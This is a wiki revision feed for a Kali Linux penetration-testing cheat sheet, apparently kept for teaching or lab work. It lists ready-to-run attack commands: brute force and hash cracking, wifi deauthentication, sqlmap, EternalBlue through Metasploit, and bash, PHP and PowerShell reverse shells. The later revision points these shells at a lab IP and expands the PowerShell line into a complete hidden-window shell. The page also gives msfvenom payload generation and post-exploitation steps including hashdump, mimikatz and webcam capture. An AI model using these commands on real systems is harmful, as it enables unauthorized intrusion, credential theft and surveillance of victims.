https://wiki.ixheim.de/index.php?action=history&feed=atom&title=Kali_Cheat_Sheet
Kali Cheat Sheet - Versionsgeschichte
2026-05-15T02:16:40Z
Versionsgeschichte dieser Seite in Xinux Wiki
MediaWiki 1.35.1
https://wiki.ixheim.de/index.php?title=Kali_Cheat_Sheet&diff=66266&oldid=prev
Thomas.will: /* System Access & Reverse Shells */
2026-01-18T14:39:04Z
<p><span dir="auto"><span class="autocomment">System Access & Reverse Shells</span></span></p>
<table class="diff diff-contentalign-left diff-editfont-monospace" data-mw="interface">
<col class="diff-marker" />
<col class="diff-content" />
<col class="diff-marker" />
<col class="diff-content" />
<tr class="diff-title" lang="de">
<td colspan="2" style="background-color: #fff; color: #202122; text-align: center;">← Nächstältere Version</td>
<td colspan="2" style="background-color: #fff; color: #202122; text-align: center;">Version vom 18. Januar 2026, 14:39 Uhr</td>
</tr><tr><td colspan="2" class="diff-lineno" id="mw-diff-left-l47" >Zeile 47:</td>
<td colspan="2" class="diff-lineno">Zeile 47:</td></tr>
<tr><td class='diff-marker'> </td><td style="background-color: #f8f9fa; color: #202122; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #eaecf0; vertical-align: top; white-space: pre-wrap;"><div>* python3 exploit.py</div></td><td class='diff-marker'> </td><td style="background-color: #f8f9fa; color: #202122; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #eaecf0; vertical-align: top; white-space: pre-wrap;"><div>* python3 exploit.py</div></td></tr>
<tr><td class='diff-marker'> </td><td style="background-color: #f8f9fa; color: #202122; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #eaecf0; vertical-align: top; white-space: pre-wrap;"><div>* search type:exploit platform:windows</div></td><td class='diff-marker'> </td><td style="background-color: #f8f9fa; color: #202122; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #eaecf0; vertical-align: top; white-space: pre-wrap;"><div>* search type:exploit platform:windows</div></td></tr>
<tr><td colspan="2"> </td><td class='diff-marker'>+</td><td style="color: #202122; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #a3d3ff; vertical-align: top; white-space: pre-wrap;"><div><ins style="font-weight: bold; text-decoration: none;"></ins></div></td></tr>
<tr><td class='diff-marker'> </td><td style="background-color: #f8f9fa; color: #202122; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #eaecf0; vertical-align: top; white-space: pre-wrap;"></td><td class='diff-marker'> </td><td style="background-color: #f8f9fa; color: #202122; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #eaecf0; vertical-align: top; white-space: pre-wrap;"></td></tr>
<tr><td class='diff-marker'> </td><td style="background-color: #f8f9fa; color: #202122; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #eaecf0; vertical-align: top; white-space: pre-wrap;"><div>== System Access & Reverse Shells ==</div></td><td class='diff-marker'> </td><td style="background-color: #f8f9fa; color: #202122; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #eaecf0; vertical-align: top; white-space: pre-wrap;"><div>== System Access & Reverse Shells ==</div></td></tr>
<tr><td class='diff-marker'> </td><td style="background-color: #f8f9fa; color: #202122; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #eaecf0; vertical-align: top; white-space: pre-wrap;"><div>* nc -lvnp 4444</div></td><td class='diff-marker'> </td><td style="background-color: #f8f9fa; color: #202122; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #eaecf0; vertical-align: top; white-space: pre-wrap;"><div>* nc -lvnp 4444</div></td></tr>
<tr><td class='diff-marker'>−</td><td style="color: #202122; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #ffe49c; vertical-align: top; white-space: pre-wrap;"><div>* bash -i >& /dev/tcp/<del class="diffchange diffchange-inline">attacker_ip</del>/4444 0>&1</div></td><td class='diff-marker'>+</td><td style="color: #202122; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #a3d3ff; vertical-align: top; white-space: pre-wrap;"><div>* bash -i >& /dev/tcp/<ins class="diffchange diffchange-inline">10.0.10.101</ins>/4444 0>&1</div></td></tr>
<tr><td class='diff-marker'>−</td><td style="color: #202122; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #ffe49c; vertical-align: top; white-space: pre-wrap;"><div>* powershell -nop -c "$client = New-Object System.Net.Sockets.TCPClient('<del class="diffchange diffchange-inline">attacker_ip</del>',4444);"</div></td><td class='diff-marker'>+</td><td style="color: #202122; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #a3d3ff; vertical-align: top; white-space: pre-wrap;"><div>* powershell -nop <ins class="diffchange diffchange-inline">-w hidden </ins>-c "$client = New-Object System.Net.Sockets.TCPClient('<ins class="diffchange diffchange-inline">10.0.10.101</ins>',4444);<ins class="diffchange diffchange-inline">$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes,0,$bytes.Length)) -ne 0){;$data = (New-Object Text.ASCIIEncoding).GetString($bytes,0,$i);$sendback = (iex $data 2>&1 | Out-String);$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()</ins>"</div></td></tr>
<tr><td class='diff-marker'> </td><td style="background-color: #f8f9fa; color: #202122; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #eaecf0; vertical-align: top; white-space: pre-wrap;"><div>* socat TCP4-LISTEN:4444,fork EXEC:/bin/bash</div></td><td class='diff-marker'> </td><td style="background-color: #f8f9fa; color: #202122; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #eaecf0; vertical-align: top; white-space: pre-wrap;"><div>* socat TCP4-LISTEN:4444,fork EXEC:/bin/bash</div></td></tr>
<tr><td class='diff-marker'>−</td><td style="color: #202122; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #ffe49c; vertical-align: top; white-space: pre-wrap;"><div>* php -r '$sock=fsockopen("<del class="diffchange diffchange-inline">attacker_ip</del>",4444);exec("/bin/sh -i <&3 >&3 2>&3");'</div></td><td class='diff-marker'>+</td><td style="color: #202122; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #a3d3ff; vertical-align: top; white-space: pre-wrap;"><div>* php -r '$sock=fsockopen("<ins class="diffchange diffchange-inline">10.0.10.101</ins>",4444);exec("/bin/sh -i <&3 >&3 2>&3");'</div></td></tr>
<tr><td class='diff-marker'>−</td><td style="color: #202122; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #ffe49c; vertical-align: top; white-space: pre-wrap;"><div>* msfvenom -p windows/meterpreter/reverse_tcp LHOST=<del class="diffchange diffchange-inline">attacker_ip </del>LPORT=4444 -f exe > shell.exe</div></td><td class='diff-marker'>+</td><td style="color: #202122; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #a3d3ff; vertical-align: top; white-space: pre-wrap;"><div>* msfvenom -p windows/meterpreter/reverse_tcp LHOST=<ins class="diffchange diffchange-inline">10.0.10.101 </ins>LPORT=4444 -f exe > shell.exe</div></td></tr>
<tr><td class='diff-marker'> </td><td style="background-color: #f8f9fa; color: #202122; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #eaecf0; vertical-align: top; white-space: pre-wrap;"></td><td class='diff-marker'> </td><td style="background-color: #f8f9fa; color: #202122; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #eaecf0; vertical-align: top; white-space: pre-wrap;"></td></tr>
<tr><td class='diff-marker'> </td><td style="background-color: #f8f9fa; color: #202122; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #eaecf0; vertical-align: top; white-space: pre-wrap;"><div>== Post-Exploitation ==</div></td><td class='diff-marker'> </td><td style="background-color: #f8f9fa; color: #202122; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #eaecf0; vertical-align: top; white-space: pre-wrap;"><div>== Post-Exploitation ==</div></td></tr>
<!-- diff cache key my_wiki:diff::1.12:old-66265:rev-66266 -->
</table>
Thomas.will
https://wiki.ixheim.de/index.php?title=Kali_Cheat_Sheet&diff=66265&oldid=prev
Thomas.will: Die Seite wurde neu angelegt: „= Kali Linux Cheat Sheet (Penetration Testing) = == Information Gathering == * nmap -sS -A target.com * whois target.com * theharvester -d target.com -b all *…“
2026-01-18T14:32:03Z
<p>Die Seite wurde neu angelegt: „= Kali Linux Cheat Sheet (Penetration Testing) = == Information Gathering == * nmap -sS -A target.com * whois target.com * theharvester -d target.com -b all *…“</p>
<p><b>Neue Seite</b></p><div>= Kali Linux Cheat Sheet (Penetration Testing) =<br />
<br />
== Information Gathering ==<br />
* nmap -sS -A target.com<br />
* whois target.com<br />
* theharvester -d target.com -b all<br />
* dnsenum target.com<br />
* dirb http://target.com/<br />
* nslookup target.com<br />
* whatweb http://target.com<br />
* recon-ng<br />
<br />
== Password Attacks ==<br />
* hydra -l admin -P rockyou.txt target.com http-get<br />
* john --wordlist=rockyou.txt hash.txt<br />
* hashcat -m 0 hash.txt rockyou.txt<br />
* cewl http://target.com -w wordlist.txt<br />
* crunch 6 10 abcdef1234<br />
* medusa -h<br />
* patator ssh_login host=IP user=FILE0 password=FILE1 0=user.txt 1=pass.txt<br />
<br />
== Wireless Attacks ==<br />
* airmon-ng start wlan0<br />
* airodump-ng wlan0mon<br />
* aireplay-ng --deauth 10 -a BSSID wlan0mon<br />
* aircrack-ng -w wordlist.txt capture.cap<br />
* wash -i wlan0mon<br />
* reaver -i wlan0mon -b BSSID -vv<br />
* wifite<br />
<br />
== Vulnerability Scanning ==<br />
* nikto -h http://target.com<br />
* wpscan --url http://target.com<br />
* sqlmap -u "http://target.com/page.php?id=1" --dbs<br />
* searchsploit apache 2.4<br />
* nuclei -t cves/ -u http://target.com<br />
* openvas-start<br />
* lynis audit system<br />
* gobuster dir -u http://target.com -w wordlist.txt<br />
<br />
== Exploitation ==<br />
* msfconsole<br />
* use exploit/windows/smb/ms17_010_eternalblue<br />
* set RHOST target_ip<br />
* set PAYLOAD windows/meterpreter/reverse_tcp<br />
* run<br />
* python3 exploit.py<br />
* search type:exploit platform:windows<br />
<br />
== System Access & Reverse Shells ==<br />
* nc -lvnp 4444<br />
* bash -i >& /dev/tcp/attacker_ip/4444 0>&1<br />
* powershell -nop -c "$client = New-Object System.Net.Sockets.TCPClient('attacker_ip',4444);"<br />
* socat TCP4-LISTEN:4444,fork EXEC:/bin/bash<br />
* php -r '$sock=fsockopen("attacker_ip",4444);exec("/bin/sh -i <&3 >&3 2>&3");'<br />
* msfvenom -p windows/meterpreter/reverse_tcp LHOST=attacker_ip LPORT=4444 -f exe > shell.exe<br />
<br />
== Post-Exploitation ==<br />
* meterpreter > getuid<br />
* meterpreter > hashdump<br />
* mimikatz<br />
* netstat -ano<br />
* wmic useraccount list brief<br />
* meterpreter > screenshot<br />
* meterpreter > webcam_snap<br />
* ps</div>
Thomas.will